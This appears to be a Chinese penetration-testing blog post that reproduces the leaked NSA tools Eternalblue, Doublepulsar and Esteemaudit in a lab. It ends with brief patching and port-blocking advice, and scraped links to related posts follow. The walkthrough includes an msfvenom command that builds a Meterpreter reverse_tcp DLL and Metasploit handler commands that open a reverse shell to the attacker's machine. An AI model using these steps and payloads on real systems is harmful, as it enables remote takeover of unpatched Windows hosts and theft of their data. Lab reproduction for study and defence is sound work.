2. 程式人生 > >【滲透測試】NSA Windows 0day漏洞+修復方案

【滲透測試】NSA Windows 0day漏洞+修復方案

阿新 發佈:2017-05-06
技術 數據 pos 創建 前段時間 更新 服務 主機 ima

這個漏洞是前段時間爆出來的,幾乎影響了全球70%的電腦,不少高校、政府和企業都還在用Windows服務器,這次時間的影響力堪稱網絡大地震。

-----------------------------------------------------------------------------------------------------------------------

一、實驗環境

本機IP:172.16.11.2 Windows 2003

本機IP:172.16.12.2 Kali Linux

靶機IP:172.16.12.3 WIN7 64

靶機IP:172.16.12.4 WIindos 2003

一、影響版本

Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Sever 2012 SP0

二、漏洞危害

攻擊者通過執行腳本,使目標主機藍屏重啟,獲取Windows目標主機權限,對目標機器進行任意操作,攻擊成本和利用條件都很低,只需在本地執行腳本,並設置相關參數。一旦攻擊成功,攻擊者能直接控制目標主機,甚至直接下載數據庫,盜取商業機密。

三、復現過程

Eternalblue 可以利用SMB漏洞獲取系統權限

Doublepulsar可以加載Metasploit生成惡意的DLL

1、首先我們要在工具的根目錄下創建一個listeningposts文件夾,否則運行程序時會報錯

技術分享

2、 運行 fb.py

填入對應信息:

  靶機IP

  目標IP

  取消重定向

  指定日誌文件目錄

  創建新項目

  項目名稱

  確認路徑

技術分享

3、這裏我們已經配置完最基本的信息,需要使用插件

use Eternalblue    //使用Eternalblue

4、接下來我們一路回車就OK了,只有幾個需要特殊設置的。要註意選擇的操作系統、系統位數、傳輸方式。我們測試環境是Win7 64 FB傳輸方式,在這裏設置就可以,其他保持默認

技術分享

5、運行成功後會顯示Eternalblue Successd

技術分享

------------------------------------------------------------------------------------------------------------------------------------

接下來我們測試另外一種插件

1、用kali生成惡意DLL,我們 /home目錄就會生成win.dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll >win.dll

技術分享

2、進入Metasploit,設置TCP監聽端口,用於攻擊成功後返回的Shell

msfconsole      
use exploit/multi/handler       //使用監聽模塊
set payload windows/x64/meterpreter/reverse_tcp  //設置payload
show options          //查看配置信息
set LHOST 172.16.12.2        //設置本地IP
set LPORT 12399             //設置本地端口
run             //運行

技術分享

Metasploit已經成功運行,等待Shell的返回

3、將dll文件放到C盤根目錄,使用Doublepulsar來加載生成的dll文件。

這裏系統位數、後們操作、後們路徑 --》 64、RunDLL、C:\win.dll,其他保持默認即可

----------------------------------------------------------------------------------------------------------------------------

使用Esteemaudit插件 驗證3389 RDP漏洞 本靶機地址:172.16.12.4

1、和上述步驟一樣,配置基本信息

2、使用 Esteemaudit插件 這裏講CallbackPort設置為8877端口(其他端口也可以)

技術分享

3、手動加載 rudo_x86.dll、capa_x86.dll和lipa_x86.dll,因為插件默認選項都在D盤,它不能識別安裝目錄。

技術分享

4、其他保持默認設置即可

技術分享

---------------------------------------------------------------------------------------------------------------------

四、漏洞修復方案

  使用防火墻過濾或者關閉137/139/445端口

  對於3389遠程登錄,至少要關閉智能卡登錄選項

  升級補丁,更新系統

【滲透測試】NSA Windows 0day漏洞+修復方案

相關推薦

滲透測試NSA Windows 0day漏洞+修復方案

技術 數據 pos 創建 前段時間 更新 服務 主機 ima 這個漏洞是前段時間爆出來的,幾乎影響了全球70%的電腦,不少高校、政府和企業都還在用Windows服務器,這次時間的影響力堪稱網絡大地震。 ------------------------------------

滲透測試目錄遍歷漏洞

許多的Web應用程式一般會有對伺服器的檔案讀取檢視的功能,大多會用到提交的引數來指明檔名 形如:http://www.nuanyue.com/getfile=image.jgp 當伺服器處理傳送過來的image.jpg檔名後,Web應用程式即會自動新增完整路徑,形如“d

滲透測試分析

本章來講解下作為乙方滲透測試工程師的一些心得吧! 我總結的主要就是兩個字:細、全 細:做滲透測試時,一定要細心加仔細,不要放過任何一個數據包和功能項。 全:一定要掌握大量的漏洞知識,儘量不要漏掉常規高中危漏洞。 滲透測試工程師和黑帽的目的是不一樣的,黑帽只

滲透實戰0day?!我是如何利用企業漏洞拿到60萬用戶資料的

/禁止轉載 作者QQ3496925334/ ●漏洞已提交,廠商已修復漏洞 ■重要細節全部打碼 ■隱私細節全部打碼 ■部分細節對外開放 ●自評Rank:15 學校要求我們做某平臺的選修作業 果然還是登入的形式,預設密碼111111 進入平臺的時候發現網站不是學校自己做的 抱著試試看的心態找

滲透課程第六篇-上傳漏洞之解析漏洞

文件的 配置文件 密碼 3.1 安裝目錄 ppa xxx 表單 圖片 上傳漏洞,我們為什麽要上傳?因為我們說過。在網站服務器上 肯定有一個Web容器,它裏面裝的就是Web應用程序 。某些腳本具有一定的執行和修改權限。這些權限可以說是服務器給客戶端訪問時提供的服務的同時提供的

滲透課程第七篇-上傳漏洞之繞過上傳漏洞

ng- 相關 都是 http itl 了解 利用 存在 上傳 前一篇我們已經講過了上傳漏洞的解析漏洞,在某些時候,知道網站存在哪個解析漏洞,那麽我們就可以更好的利用上傳漏洞 這個知識點在我們前面就有粗略說過了(http://www.yuntest.org/index.php

滲透課程第八篇-上傳漏洞之文本編輯器上傳

fckeditor -m ive conf ima xheditor ger .org 圖片上傳 Oday 常見的文本編輯器有CKEditor,Ewebeditor,UEditor,KindEditor,XHeditor等。其包含的功能類似,比如,圖片上傳、視頻上傳、遠程下

滲透測試學習平臺 web for pentester -3.目錄遍歷

線上 ini blog etc col tdi jos turn bsp Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example

windows安裝kafka過程 本地測試外賦快速啟動小指令碼

winsows 上裝kafka也蠻簡單方便   下載:wget https://www.apache.org/dyn/closer.cgi?path=/kafka/2.1.0/kafka_2.12-2.1.0.tgz   解壓到某檔案下  ${kafka-path} 在 

漏洞預警最新VirtualBox 0day漏洞公開

根據最初披露的細節,這個問題存在於虛擬化軟體的共享程式碼庫中,該庫在所有作業系統都支援。 利用該漏洞,攻擊者可以實現虛擬機器逃逸,到達Ring 3層,該層用於大多數使用者程式執行程式碼,許可權最少。 將一個“溢位”變成另一個“溢位” Sergey Zelenyu

滲透實戰waf配置不當,某企業的xss跨站漏洞

/禁止轉載 原作者QQ:3496925334/ ■重要細節全部打碼 ■部分細節對外開放 ●漏洞已提交,無影響廠商忽略 ●尋找注入點 開啟網頁就發現一個搜尋欄, 隨便寫一些東西,回車 搜出0條記錄,在後面加上永真判斷 ‘or’’=’ 回車,搜出2000多條記錄 ■初步判斷:教科書式的注入漏

安全測試Web應用安全之XSS跨站指令碼攻擊漏洞相關

閱讀目錄 歡迎轉載,也請註明出處 :http://www.cnblogs.com/Detector/p/8811216.html 謝謝!前言 以前都只是在各類文件中見到過XSS,也進行過相關的學習,但是都是一知半解,過了一段時間就忘了。 前幾天我們收到了了一份標題為《XX賬號暱稱引數中存在儲存XSS漏洞

安全測試Web應用安全之XSS跨站指令碼攻擊漏洞

前言 以前都只是在各類文件中見到過XSS,也進行過相關的學習,但是都是一知半解,過了一段時間就忘了。 前幾天我們收到了了一份標題為《XX賬號暱稱引數中存在儲存XSS漏洞》的報告文件,來源是一個叫漏洞盒子的機構,看它的官方介紹,是一個網際網路安全測試眾測平臺。 第一次在實際工作中遇到相關的問題,所以決定再系統的

滲透課程特別篇-主流網站程序Oday大全以及拿shell思路

windows系統 站點 大致 ive iis7 from referer 滲透 瀏覽器 版權和內容說明: 這篇文章不是本站編寫,是從網絡上摘抄的,但是經過了本站的改寫優化,並將內容,格式規範化。 本篇說明:這篇文章結合了前輩們前幾年一路挖掘出來的主流程序漏洞以及思路,

滲透課程第二篇下-HTTP協議的請求與響應深度剖析

語記 空行 服務器端 oid 原因 str 負載 log 引用 【滲透課程】第二篇下-HTTP協議的請求與響應深度剖析 HTTP1.1目前支持以下7種請求方法: 常見的MIME類型如下: 第一個數字有五種可能的取值: 目錄 什麽是請求方法?什麽是請求頭?

滲透課程第三篇-體驗http協議的應用

load 簡單介紹 class 發送數據 數據交互 動手實驗 服務端 yun 屬於 之前我們都了解了,訪問網頁時,客戶端與服務端之間的請求與響應數據交互。本篇就淺談它的應用。 利用HTTP攔截突破前段驗證 比方說,我們在某個網頁提交某些數據(例如留言、上傳、插入xss等)

滲透課程前言-揭開Web滲透與安全的面紗(必看)

blank 可見 box 網站 大致 物理 org 知識點 get 服務器是怎麽被入侵的 攻擊者想要對一臺計算機滲透必須具備以下條件: 1、服務器與客戶端能夠正常通訊 (服務器是為客戶端提供服務的) 2、服務器向客戶端提供的權限(服務)或者說是端口。 服務端所提供的服務 早

滲透課程第二篇上-http請求協議的簡單描述

html 文章 ont tp服務器 交互 .exe 打開 路徑 什麽 HTTP協議剖析 什麽是HTTP協議?如何發起請求?我認為這樣講大家能夠理解: 瀏覽器訪問網站也是http請求的一個過程。當你打開瀏覽器,訪問一個URL (協議://服務器IP:端口/路徑/文件)的時候,

滲透筆記拿下復旦大學的艱難過程

火墻 可見 兩個 hms www 滲透 dsc serv-u ida 轉載自:L04sblog 一、師出有名某日十分無聊,就和X論壇的超級版主wyzhack瞎吹牛,東年西扯的。後來不知道怎麽的扯到復旦去了,他提議說不如我們黑掉復旦吧。正好當時也比較清閑,就答應一起看看了,嘿

java測試Junit、Mock+代碼覆蓋率

tput 活性 插件 報告 tsa println doc 彈出 exe 原文見此處 單元測試是編寫測試代碼,用來檢測特定的、明確的、細顆粒的功能。單元測試並不一定保證程序功能是正確的,更不保證整體業務是準備的。 單元測試不僅僅用來保證當前代碼的正確性,更重要的是用來保證代